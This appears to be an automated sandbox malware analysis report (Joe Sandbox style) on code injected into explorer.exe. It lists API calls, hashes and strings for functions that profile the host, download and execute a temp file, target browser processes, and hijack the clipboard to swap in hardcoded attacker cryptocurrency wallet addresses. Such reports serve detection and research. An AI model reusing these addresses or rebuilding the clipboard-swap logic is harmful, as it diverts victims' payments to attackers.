                                                                                                                                                                                                                        • Opcode ID: 8937f8d0cf8cbbd61bd8bb879e93316df55ae13826605ff65dd1b33f3e9d68b7
                                                                                                                                                                                                                        • Instruction ID: bc49b06de2d12cf06955f37fd58d24161e07a6566d43ffb3d312731ab11c3deb
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 8937f8d0cf8cbbd61bd8bb879e93316df55ae13826605ff65dd1b33f3e9d68b7
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 24F19372304A82C6DB30EF6AE8447BA77A1F748B88F45D126CE4B47A64DF78D285C750
                                                                                                                                                                                                                        Function 0DFAA620 Relevance: 21.1, APIs: 14, Instructions: 142stringfilenetworkCOMMONLIBRARYCODE
                                                                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                        • lstrlenA.KERNEL32 ref: 0DFAA6C2
                                                                                                                                                                                                                        • InternetCrackUrlA.WININET ref: 0DFAA6D7
                                                                                                                                                                                                                          • Part of subcall function 0DFA6E10: lstrcpyA.KERNEL32 ref: 0DFA6E6E
                                                                                                                                                                                                                          • Part of subcall function 0DFA6E10: lstrcatA.KERNEL32 ref: 0DFA6E7F
                                                                                                                                                                                                                          • Part of subcall function 0DFA6E10: lstrcatA.KERNEL32 ref: 0DFA6E93
                                                                                                                                                                                                                          • Part of subcall function 0DFA6E10: lstrcatA.KERNEL32 ref: 0DFA6EA7
                                                                                                                                                                                                                          • Part of subcall function 0DFA6E10: lstrcatA.KERNEL32 ref: 0DFA6EB8
                                                                                                                                                                                                                          • Part of subcall function 0DFA6E10: lstrcatA.KERNEL32 ref: 0DFA6ECC
                                                                                                                                                                                                                          • Part of subcall function 0DFA6E10: lstrcatA.KERNEL32 ref: 0DFA6EEA
                                                                                                                                                                                                                          • Part of subcall function 0DFA6E10: wsprintfA.USER32 ref: 0DFA6F02
                                                                                                                                                                                                                          • Part of subcall function 0DFA6E10: lstrcatA.KERNEL32 ref: 0DFA6F16
                                                                                                                                                                                                                          • Part of subcall function 0DFA6E10: lstrcatA.KERNEL32 ref: 0DFA6F2A
                                                                                                                                                                                                                          • Part of subcall function 0DFA6E10: lstrcatA.KERNEL32 ref: 0DFA6F66
                                                                                                                                                                                                                          • Part of subcall function 0DFA6E10: WSAStartup.WS2_32 ref: 0DFA6F76
                                                                                                                                                                                                                          • Part of subcall function 0DFA6E10: socket.WS2_32 ref: 0DFA6F92
                                                                                                                                                                                                                          • Part of subcall function 0DFA6E10: gethostbyname.WS2_32 ref: 0DFA6FA9
                                                                                                                                                                                                                          • Part of subcall function 0DFA6E10: memcpy.MSVCRT ref: 0DFA6FC9
                                                                                                                                                                                                                          • Part of subcall function 0DFA6E10: htons.WS2_32 ref: 0DFA6FD8
                                                                                                                                                                                                                          • Part of subcall function 0DFA6E10: connect.WS2_32 ref: 0DFA6FEF
                                                                                                                                                                                                                          • Part of subcall function 0DFA6E10: lstrlenA.KERNEL32 ref: 0DFA7005
                                                                                                                                                                                                                          • Part of subcall function 0DFA6E10: send.WS2_32 ref: 0DFA701B
                                                                                                                                                                                                                        • PathFindFileNameA.SHLWAPI ref: 0DFAA751
                                                                                                                                                                                                                        • GetTempPathA.KERNEL32 ref: 0DFAA76F
                                                                                                                                                                                                                        • GetTempFileNameA.KERNEL32 ref: 0DFAA785
                                                                                                                                                                                                                        • lstrcatA.KERNEL32 ref: 0DFAA795
                                                                                                                                                                                                                        • lstrcatA.KERNEL32 ref: 0DFAA7A1
                                                                                                                                                                                                                        • CreateFileA.KERNEL32 ref: 0DFAA7CA
                                                                                                                                                                                                                        • WriteFile.KERNEL32 ref: 0DFAA7EF
                                                                                                                                                                                                                        • free.MSVCRT ref: 0DFAA7FE
                                                                                                                                                                                                                        • CloseHandle.KERNEL32 ref: 0DFAA807
                                                                                                                                                                                                                        • ShellExecuteA.SHELL32 ref: 0DFAA835
                                                                                                                                                                                                                        • CloseHandle.KERNEL32 ref: 0DFAA844
                                                                                                                                                                                                                        • free.MSVCRT ref: 0DFAA84F
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 00000005.00000002.2692336010.000000000DFA0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0DFA0000, based on PE: true
                                                                                                                                                                                                                        • Associated: 00000005.00000002.2692336010.000000000DFE9000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 00000005.00000002.2692336010.000000000DFEB000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_5_2_dfa0000_explorer.jbxd
                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: lstrcat$File$CloseHandleNamePathTempfreelstrlen$CrackCreateExecuteFindInternetShellStartupWriteconnectgethostbynamehtonslstrcpymemcpysendsocketwsprintf
                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                        • API String ID: 3619236930-0
                                                                                                                                                                                                                        • Opcode ID: dd3a24cb8d624ece3b86332d21e7091f11c7b9a917e87207749051ceddd69b08
                                                                                                                                                                                                                        • Instruction ID: f2b2d9f7bd3bb67f04442282de25ca26e6f81d37a872ef5f7016d08cb2225f6f
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: dd3a24cb8d624ece3b86332d21e7091f11c7b9a917e87207749051ceddd69b08
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 235197727046418AEB20CFA9E8543AE77B1F788B88F44C026DE4A4BB64DF78C149CB10
                                                                                                                                                                                                                        Function 0DFAA990 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 87COMMONLIBRARYCODE
                                                                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                        • GetUserNameW.ADVAPI32 ref: 0DFAAA49
                                                                                                                                                                                                                        • GetComputerNameW.KERNEL32 ref: 0DFAAA63
                                                                                                                                                                                                                          • Part of subcall function 0DFAA350: WideCharToMultiByte.KERNEL32 ref: 0DFAA393
                                                                                                                                                                                                                        • GetNativeSystemInfo.KERNEL32 ref: 0DFAAA8C
                                                                                                                                                                                                                        • GetVersionExA.KERNEL32 ref: 0DFAAA9D
                                                                                                                                                                                                                        • wsprintfA.USER32 ref: 0DFAAAED
                                                                                                                                                                                                                          • Part of subcall function 0DFA8FA0: EnterCriticalSection.KERNEL32 ref: 0DFA8FE8
                                                                                                                                                                                                                          • Part of subcall function 0DFA8FA0: RtlInitializeCriticalSection.NTDLL ref: 0DFA8FF5
                                                                                                                                                                                                                          • Part of subcall function 0DFA8FA0: lstrcpyA.KERNEL32 ref: 0DFA902A
                                                                                                                                                                                                                          • Part of subcall function 0DFA8FA0: lstrcpyA.KERNEL32 ref: 0DFA904D
                                                                                                                                                                                                                          • Part of subcall function 0DFA8FA0: lstrcatA.KERNEL32 ref: 0DFA905D
                                                                                                                                                                                                                          • Part of subcall function 0DFA8FA0: lstrcatA.KERNEL32 ref: 0DFA906D
                                                                                                                                                                                                                          • Part of subcall function 0DFA8FA0: LeaveCriticalSection.KERNEL32 ref: 0DFA90F4
                                                                                                                                                                                                                          • Part of subcall function 0DFA8FA0: memcpy.MSVCRT ref: 0DFA910C
                                                                                                                                                                                                                          • Part of subcall function 0DFA8FA0: lstrlenA.KERNEL32 ref: 0DFA911A
                                                                                                                                                                                                                        • free.MSVCRT ref: 0DFAAB01
                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 00000005.00000002.2692336010.000000000DFA0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0DFA0000, based on PE: true
                                                                                                                                                                                                                        • Associated: 00000005.00000002.2692336010.000000000DFE9000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 00000005.00000002.2692336010.000000000DFEB000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_5_2_dfa0000_explorer.jbxd
                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: CriticalSection$Namelstrcatlstrcpy$ByteCharComputerEnterInfoInitializeLeaveMultiNativeSystemUserVersionWidefreelstrlenmemcpywsprintf
                                                                                                                                                                                                                        • String ID: 2.6
                                                                                                                                                                                                                        • API String ID: 2800961625-471037017
                                                                                                                                                                                                                        • Opcode ID: 8cf8951c5f05f57b087d243209f13a07d60f62d93e5cc917ee797ccb51e54963
                                                                                                                                                                                                                        • Instruction ID: 96d3752c666321430e742fd1bfbae3906b59e83edf03cd197c9e9db598d0fb76
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 8cf8951c5f05f57b087d243209f13a07d60f62d93e5cc917ee797ccb51e54963
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: BF418072614B818AE720DF65E8443DEB7A5F788788F848016EB4E47A68DF79C649CB10
                                                                                                                                                                                                                        Function 0DFA8400 Relevance: 9.1, APIs: 6, Instructions: 73memorythreadCOMMONLIBRARYCODE
                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 00000005.00000002.2692336010.000000000DFA0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0DFA0000, based on PE: true
                                                                                                                                                                                                                        • Associated: 00000005.00000002.2692336010.000000000DFE9000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 00000005.00000002.2692336010.000000000DFEB000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_5_2_dfa0000_explorer.jbxd
                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: AllocCurrentHeap$CloseHandleNextProcessThreadThread32
                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                        • API String ID: 3234909527-0
                                                                                                                                                                                                                        • Opcode ID: 5aad866f40af7152a324c12d8ab028949bc82d9e846d66ebce9f25498e0832bc
                                                                                                                                                                                                                        • Instruction ID: 3ced14ee01c211bc6a7751f32a78fdb844fe5577f5cea35c2866fcdb5b538720
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 5aad866f40af7152a324c12d8ab028949bc82d9e846d66ebce9f25498e0832bc
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 0F319371604A42C6EB20CF6AE41037E77A2F788BD8F08C225DA6A47758DF78C601CB50
                                                                                                                                                                                                                        Function 0DFBBE90 Relevance: 33.4, APIs: 11, Strings: 8, Instructions: 101stringthreadCOMMONLIBRARYCODE
                                                                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 00000005.00000002.2692336010.000000000DFA0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0DFA0000, based on PE: true
                                                                                                                                                                                                                        • Associated: 00000005.00000002.2692336010.000000000DFE9000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 00000005.00000002.2692336010.000000000DFEB000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_5_2_dfa0000_explorer.jbxd
                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: lstrcmpi$Create$FileNameThread$CloseFindHandleModuleMutexPath
                                                                                                                                                                                                                        • String ID: brave.exe$browser.exe$chrome.exe$explorer.exe$firefox.exe$msedge.exe$opera.exe$rbNSpGEsyb
                                                                                                                                                                                                                        • API String ID: 936357808-3480109235
                                                                                                                                                                                                                        • Opcode ID: ee8f65a1b6f4cb3d7a5e3f230dea153159f92231231d0cf3bee3010b95cdded4
                                                                                                                                                                                                                        • Instruction ID: 61a35b82d53e7c8da635708e40690916209f61bd0e41946023f497abb40f1e69
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: ee8f65a1b6f4cb3d7a5e3f230dea153159f92231231d0cf3bee3010b95cdded4
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: E241616061868391EB54ABBAFC543BE3397EF84784F45C03BDA4B46268DFBCC5448760
                                                                                                                                                                                                                        Function 0E11BE90 Relevance: 33.4, APIs: 11, Strings: 8, Instructions: 101stringthreadCOMMONLIBRARYCODE
                                                                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 00000005.00000002.2692713862.000000000E100000.00000040.00000001.00020000.00000000.sdmp, Offset: 0E100000, based on PE: true
                                                                                                                                                                                                                        • Associated: 00000005.00000002.2692713862.000000000E149000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 00000005.00000002.2692713862.000000000E14B000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_5_2_e100000_explorer.jbxd
                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: lstrcmpi$Create$FileNameThread$CloseFindHandleModuleMutexPath
                                                                                                                                                                                                                        • String ID: brave.exe$browser.exe$chrome.exe$explorer.exe$firefox.exe$msedge.exe$opera.exe$rbNSpGEsyb
                                                                                                                                                                                                                        • API String ID: 936357808-3480109235
                                                                                                                                                                                                                        • Opcode ID: ee8f65a1b6f4cb3d7a5e3f230dea153159f92231231d0cf3bee3010b95cdded4
                                                                                                                                                                                                                        • Instruction ID: eaae3fc654735287cc23ed985e7c88576d19fee68efd09cbf8756417bef3c19a
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: ee8f65a1b6f4cb3d7a5e3f230dea153159f92231231d0cf3bee3010b95cdded4
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 4D418170228A86C1EB54EB32E8507DA23D6FF8C784F440866DA8A572A8DF7CC6C4C751
                                                                                                                                                                                                                        Function 0FF5BE90 Relevance: 33.4, APIs: 11, Strings: 8, Instructions: 101stringthreadCOMMONLIBRARYCODE
                                                                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 00000005.00000002.2693672172.000000000FF40000.00000040.00000001.00020000.00000000.sdmp, Offset: 0FF40000, based on PE: true
                                                                                                                                                                                                                        • Associated: 00000005.00000002.2693672172.000000000FF89000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 00000005.00000002.2693672172.000000000FF8B000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_5_2_ff40000_explorer.jbxd
                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: lstrcmpi$Create$FileNameThread$CloseFindHandleModuleMutexPath
                                                                                                                                                                                                                        • String ID: brave.exe$browser.exe$chrome.exe$explorer.exe$firefox.exe$msedge.exe$opera.exe$rbNSpGEsyb
                                                                                                                                                                                                                        • API String ID: 936357808-3480109235
                                                                                                                                                                                                                        • Opcode ID: ee8f65a1b6f4cb3d7a5e3f230dea153159f92231231d0cf3bee3010b95cdded4
                                                                                                                                                                                                                        • Instruction ID: e092c9ab2a9055c90b766a70aae232e1b00a0c06bc65ffeb13fe9ff55e0775cb
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: ee8f65a1b6f4cb3d7a5e3f230dea153159f92231231d0cf3bee3010b95cdded4
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 7F416D30218B4381EB64BB71EC5037A7795EF88BC4F800035DE4A46AA9EF3CD1499755
                                                                                                                                                                                                                        Function 0DFAA1B0 Relevance: 16.6, APIs: 11, Instructions: 112memoryfileCOMMONLIBRARYCODE
                                                                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 00000005.00000002.2692336010.000000000DFA0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0DFA0000, based on PE: true
                                                                                                                                                                                                                        • Associated: 00000005.00000002.2692336010.000000000DFE9000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 00000005.00000002.2692336010.000000000DFEB000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_5_2_dfa0000_explorer.jbxd
                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: Heap$File$Process$AllocCloseCreateFreeHandleReadSize
                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                        • API String ID: 3250796435-0
                                                                                                                                                                                                                        • Opcode ID: 4999e7ccdb6d133b0e9522f9030a530e963fb9a5ffeb94da4667c25ff20d675b
                                                                                                                                                                                                                        • Instruction ID: f8f3e1c174665d7988cb8d238b2ec90cc58991b3f39c2cfb888d52b321f795cf
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 4999e7ccdb6d133b0e9522f9030a530e963fb9a5ffeb94da4667c25ff20d675b
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: B1418C72705B4186DB518F6AE84876E77A6FB88B90F44C226DE5E43B54EF3DC049CB20
                                                                                                                                                                                                                        Function 0DFA9D80 Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 53stringCOMMONLIBRARYCODE
                                                                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                          • Part of subcall function 0DFA9C50: GetWindowsDirectoryW.KERNEL32 ref: 0DFA9CA3
                                                                                                                                                                                                                          • Part of subcall function 0DFA9C50: GetVolumeInformationW.KERNEL32 ref: 0DFA9CF2
                                                                                                                                                                                                                          • Part of subcall function 0DFA9C50: wsprintfW.USER32 ref: 0DFA9D54
                                                                                                                                                                                                                        • SHGetFolderPathW.SHELL32 ref: 0DFA9DE5
                                                                                                                                                                                                                        • lstrcatW.KERNEL32 ref: 0DFA9DF5
                                                                                                                                                                                                                        • lstrcatW.KERNEL32 ref: 0DFA9E03
                                                                                                                                                                                                                        • CreateDirectoryW.KERNEL32 ref: 0DFA9E0E
                                                                                                                                                                                                                        • SetFileAttributesW.KERNEL32 ref: 0DFA9E1C
                                                                                                                                                                                                                        • lstrcatW.KERNEL32 ref: 0DFA9E2C
                                                                                                                                                                                                                        • lstrcatW.KERNEL32 ref: 0DFA9E3A
                                                                                                                                                                                                                        • lstrcatW.KERNEL32 ref: 0DFA9E4A
                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 00000005.00000002.2692336010.000000000DFA0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0DFA0000, based on PE: true
                                                                                                                                                                                                                        • Associated: 00000005.00000002.2692336010.000000000DFE9000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 00000005.00000002.2692336010.000000000DFEB000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_5_2_dfa0000_explorer.jbxd
                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: lstrcat$Directory$AttributesCreateFileFolderInformationPathVolumeWindowswsprintf
                                                                                                                                                                                                                        • String ID: .exe
                                                                                                                                                                                                                        • API String ID: 1846285901-4119554291
                                                                                                                                                                                                                        • Opcode ID: c2465feb47dfbf4e39e3fb636e60b490fb9b3a01f4a1802c0286285fc0bd52c3
                                                                                                                                                                                                                        • Instruction ID: 8b1d7861878b2eba111361a400df37aa111bf1c5faa515e8e865dcffa86103dd
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: c2465feb47dfbf4e39e3fb636e60b490fb9b3a01f4a1802c0286285fc0bd52c3
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 4521F332319B42A6EB90DB65F81876D33A2FB89744F459036DA8F87714EE38C519CB24
                                                                                                                                                                                                                        Function 0DFA9E70 Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 48stringCOMMONLIBRARYCODE
                                                                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                          • Part of subcall function 0DFA9B30: GetWindowsDirectoryA.KERNEL32 ref: 0DFA9B7C
                                                                                                                                                                                                                          • Part of subcall function 0DFA9B30: GetVolumeInformationA.KERNEL32 ref: 0DFA9BC6
                                                                                                                                                                                                                          • Part of subcall function 0DFA9B30: wsprintfA.USER32 ref: 0DFA9C27
                                                                                                                                                                                                                        • SHGetFolderPathA.SHELL32 ref: 0DFA9EC3
                                                                                                                                                                                                                        • lstrcatA.KERNEL32 ref: 0DFA9ED3
                                                                                                                                                                                                                        • lstrcatA.KERNEL32 ref: 0DFA9EE1
                                                                                                                                                                                                                        • CreateDirectoryA.KERNEL32 ref: 0DFA9EEC
                                                                                                                                                                                                                        • SetFileAttributesA.KERNEL32 ref: 0DFA9EFA
                                                                                                                                                                                                                        • lstrcatA.KERNEL32 ref: 0DFA9F0A
                                                                                                                                                                                                                        • lstrcatA.KERNEL32 ref: 0DFA9F18
                                                                                                                                                                                                                        • lstrcatA.KERNEL32 ref: 0DFA9F28
                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 00000005.00000002.2692336010.000000000DFA0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0DFA0000, based on PE: true
                                                                                                                                                                                                                        • Associated: 00000005.00000002.2692336010.000000000DFE9000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 00000005.00000002.2692336010.000000000DFEB000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_5_2_dfa0000_explorer.jbxd
                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: lstrcat$Directory$AttributesCreateFileFolderInformationPathVolumeWindowswsprintf
                                                                                                                                                                                                                        • String ID: .exe
                                                                                                                                                                                                                        • API String ID: 1846285901-4119554291
                                                                                                                                                                                                                        • Opcode ID: 60a5b1947e9a1e6045203543321f9579d85a40846c9d1738233bd2d77a5d265c
                                                                                                                                                                                                                        • Instruction ID: b471df98b209a6e899d18728240feb90184db3af7f9698d6b22fbd31ed70697b
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 60a5b1947e9a1e6045203543321f9579d85a40846c9d1738233bd2d77a5d265c
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 13113A21215B4692EB40DF65FC5476EB3A3FB89B84F44A036EA8B07728DE3CC104CB14
                                                                                                                                                                                                                        Function 0DFB7F00 Relevance: 15.3, APIs: 1, Strings: 9, Instructions: 332sleepCOMMON
                                                                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                                        control_flow_graph 884 dfb7f00-dfb7f2a call dfb8550 887 dfb7f30-dfb7f66 call dfb84b0 call dfa2c10 call dfb7df0 call dfb85e0 884->887 896 dfb7fcb-dfb7ff8 call dfa2c10 call dfb7df0 call dfb85e0 887->896 897 dfb7f68-dfb7fc6 call dfa1100 call dfa2c10 call dfb7df0 call dfb8650 call dfa2c10 call dfb86a0 call dfa1200 887->897 910 dfb7ffa-dfb8058 call dfa1100 call dfa2c10 call dfb7df0 call dfb8650 call dfa2c10 call dfb86a0 call dfa1200 896->910 911 dfb805d-dfb808a call dfa2c10 call dfb7df0 call dfb85e0 896->911 897->896 910->911 931 dfb80ef-dfb811c call dfa2c10 call dfb7df0 call dfb85e0 911->931 932 dfb808c-dfb80ea call dfa1100 call dfa2c10 call dfb7df0 call dfb8650 call dfa2c10 call dfb86a0 call dfa1200 911->932 952 dfb811e-dfb817c call dfa1100 call dfa2c10 call dfb7df0 call dfb8650 call dfa2c10 call dfb86a0 call dfa1200 931->952 953 dfb8181-dfb81ae call dfa2c10 call dfb7df0 call dfb85e0 931->953 932->931 952->953 973 dfb8213-dfb8240 call dfa2c10 call dfb7df0 call dfb85e0 953->973 974 dfb81b0-dfb820e call dfa1100 call dfa2c10 call dfb7df0 call dfb8650 call dfa2c10 call dfb86a0 call dfa1200 953->974 994 dfb8242-dfb82a0 call dfa1100 call dfa2c10 call dfb7df0 call dfb8650 call dfa2c10 call dfb86a0 call dfa1200 973->994 995 dfb82a5-dfb82d2 call dfa2c10 call dfb7df0 call dfb85e0 973->995 974->973 994->995 1015 dfb8337-dfb8364 call dfa2c10 call dfb7df0 call dfb85e0 995->1015 1016 dfb82d4-dfb8332 call dfa1100 call dfa2c10 call dfb7df0 call dfb8650 call dfa2c10 call dfb86a0 call dfa1200 995->1016 1036 dfb83c9-dfb83f6 call dfa2c10 call dfb7df0 call dfb85e0 1015->1036 1037 dfb8366-dfb83c4 call dfa1100 call dfa2c10 call dfb7df0 call dfb8650 call dfa2c10 call dfb86a0 call dfa1200 1015->1037 1016->1015 1057 dfb845b-dfb846a Sleep call dfa1200 1036->1057 1058 dfb83f8-dfb8456 call dfa1100 call dfa2c10 call dfb7df0 call dfb8650 call dfa2c10 call dfb86a0 call dfa1200 1036->1058 1037->1036 1063 dfb846f 1057->1063 1058->1057 1063->887
                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                          • Part of subcall function 0DFB84B0: OpenClipboard.USER32 ref: 0DFB84C1
                                                                                                                                                                                                                          • Part of subcall function 0DFB84B0: GetClipboardData.USER32 ref: 0DFB84D3
                                                                                                                                                                                                                          • Part of subcall function 0DFB84B0: GlobalLock.KERNEL32 ref: 0DFB84E4
                                                                                                                                                                                                                          • Part of subcall function 0DFB84B0: GlobalUnlock.KERNEL32 ref: 0DFB84F5
                                                                                                                                                                                                                          • Part of subcall function 0DFB84B0: CloseClipboard.USER32 ref: 0DFB84FB
                                                                                                                                                                                                                          • Part of subcall function 0DFB86A0: GlobalAlloc.KERNEL32 ref: 0DFB86C8
                                                                                                                                                                                                                          • Part of subcall function 0DFB86A0: GlobalLock.KERNEL32 ref: 0DFB86DF
                                                                                                                                                                                                                          • Part of subcall function 0DFB86A0: GlobalUnlock.KERNEL32 ref: 0DFB86F7
                                                                                                                                                                                                                          • Part of subcall function 0DFB86A0: OpenClipboard.USER32 ref: 0DFB86FF
                                                                                                                                                                                                                          • Part of subcall function 0DFB86A0: EmptyClipboard.USER32 ref: 0DFB8705
                                                                                                                                                                                                                          • Part of subcall function 0DFB86A0: SetClipboardData.USER32 ref: 0DFB8713
                                                                                                                                                                                                                          • Part of subcall function 0DFB86A0: CloseClipboard.USER32 ref: 0DFB8719
                                                                                                                                                                                                                        • Sleep.KERNEL32 ref: 0DFB8460
                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                        • DU8bbCYGxj3be3XDMiipMJdFFGHgwDzLB5, xrefs: 0DFB8366
                                                                                                                                                                                                                        • 0x6f5d22258243f738460e0e4fe1f8c0fa58ce9abe, xrefs: 0DFB7FFA
                                                                                                                                                                                                                        • bitcoincash:qr7r9w340hvnxqjm2cjpj3kd0s7kfz02ks5su6hrze, xrefs: 0DFB81B0
                                                                                                                                                                                                                        • 13MUDpYmziJo8zMD2743Ygch5c1ae8QiNV, xrefs: 0DFB7F68
                                                                                                                                                                                                                        • XuLskqV3efHE8eaJDu8oeeLoUn6hHpUAyH, xrefs: 0DFB83F8
                                                                                                                                                                                                                        • TBid7Hs8NBHCPytFMgKc3VTvzFgL5KPMbb, xrefs: 0DFB808C
                                                                                                                                                                                                                        • rNcd1L9tTLohuJh45vUtcisKcgGJTCtnTv, xrefs: 0DFB82D4
                                                                                                                                                                                                                        • LQwgkF3f1AAZZ3WuewhRobt2h15NWfivtx, xrefs: 0DFB811E
                                                                                                                                                                                                                        • addr18kvGyaCauRTSejv3qoSvmsXBGn77NhdfFjj3s9l2ccgr2fqzs9p7cl8rr2ckq4c7emm9uaa0s7ynk32ysaxmr5xaazqj4gex0, xrefs: 0DFB8242
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 00000005.00000002.2692336010.000000000DFA0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0DFA0000, based on PE: true
                                                                                                                                                                                                                        • Associated: 00000005.00000002.2692336010.000000000DFE9000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 00000005.00000002.2692336010.000000000DFEB000.00000040.00000001.00020000.00000000.sdmpDownload File
